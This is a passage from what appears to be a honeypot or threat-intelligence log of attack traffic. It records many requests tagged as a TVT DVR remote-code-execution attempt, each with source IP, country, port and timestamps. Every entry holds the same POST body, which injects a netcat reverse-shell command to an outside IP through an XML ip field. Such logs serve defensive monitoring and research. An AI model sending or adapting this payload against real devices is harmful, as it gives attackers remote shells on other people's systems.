- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T09:13:32Z",
- "last_seen": "2019-12-21T09:13:32Z"
- },
- {
- "source_ip_address": "81.213.166.44",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T09:00:30Z",
- "last_seen": "2019-12-21T09:00:30Z"
- },
- {
- "source_ip_address": "142.167.191.239",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T08:54:27Z",
- "last_seen": "2019-12-21T08:54:27Z"
- },
- {
- "source_ip_address": "74.101.32.128",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T08:54:17Z",
- "last_seen": "2019-12-21T08:54:17Z"
- },
- {
- "source_ip_address": "186.4.184.104",
- "country": "EC",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T08:43:28Z",
- "last_seen": "2019-12-21T08:43:28Z"
- },
- {
- "source_ip_address": "93.139.184.115",
- "country": "HR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T08:38:58Z",
- "last_seen": "2019-12-21T08:38:58Z"
- },
- {
- "source_ip_address": "31.45.242.224",
- "country": "HR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T08:37:49Z",
- "last_seen": "2019-12-21T08:37:49Z"
- },
- {
- "source_ip_address": "61.63.176.139",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T08:32:23Z",
- "last_seen": "2019-12-21T08:32:23Z"
- },
- {
- "source_ip_address": "124.44.2.169",
- "country": "JP",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 95,
- "first_seen": "2019-12-21T08:23:09Z",
- "last_seen": "2019-12-21T08:23:09Z"
- },
- {
- "source_ip_address": "93.43.224.178",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 11,
- "first_seen": "2019-12-21T08:01:45Z",
- "last_seen": "2019-12-21T08:01:45Z"
- },
- {
- "source_ip_address": "107.5.49.137",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T07:59:36Z",
- "last_seen": "2019-12-21T07:59:36Z"
- },
- {
- "source_ip_address": "70.154.89.154",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T07:48:54Z",
- "last_seen": "2019-12-21T07:48:54Z"
- },
- {
- "source_ip_address": "185.188.236.229",
- "country": "SK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-20T10:31:11Z",
- "last_seen": "2019-12-21T07:47:26Z"
- },
- {
- "source_ip_address": "103.224.200.9",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T07:46:13Z",
- "last_seen": "2019-12-21T07:46:13Z"
- },
- {
- "source_ip_address": "98.239.24.188",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T07:36:51Z",
- "last_seen": "2019-12-21T07:36:51Z"
- },
- {
- "source_ip_address": "78.139.27.208",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-21T07:21:42Z",
- "last_seen": "2019-12-21T07:21:42Z"
- },
- {
- "source_ip_address": "123.0.220.246",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 11,
- "first_seen": "2019-12-21T07:18:43Z",
- "last_seen": "2019-12-21T07:18:43Z"
- },
- {
- "source_ip_address": "187.162.185.110",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T07:16:43Z",
- "last_seen": "2019-12-21T07:16:43Z"
- },
- {
- "source_ip_address": "83.27.249.43",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T06:56:42Z",
- "last_seen": "2019-12-21T06:56:42Z"
- },
- {
- "source_ip_address": "73.124.24.41",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T06:42:24Z",
- "last_seen": "2019-12-21T06:42:24Z"
- },
- {
- "source_ip_address": "216.126.74.83",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T06:41:33Z",
- "last_seen": "2019-12-21T06:41:33Z"
- },
- {
- "source_ip_address": "151.250.242.181",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T06:39:08Z",
- "last_seen": "2019-12-21T06:39:08Z"
- },
- {
- "source_ip_address": "201.171.102.225",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-19T16:37:58Z",
- "last_seen": "2019-12-21T06:37:12Z"
- },
- {
- "source_ip_address": "121.122.124.241",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T06:33:40Z",
- "last_seen": "2019-12-21T06:33:40Z"
- },
- {
- "source_ip_address": "176.214.92.114",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 105,
- "first_seen": "2019-12-21T06:30:10Z",
- "last_seen": "2019-12-21T06:30:10Z"
- },
- {
- "source_ip_address": "91.240.134.122",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-21T06:23:43Z",
- "last_seen": "2019-12-21T06:23:43Z"
- },
- {
- "source_ip_address": "187.163.90.64",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T06:13:38Z",
- "last_seen": "2019-12-21T06:13:38Z"
- },
- {
- "source_ip_address": "149.34.21.224",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
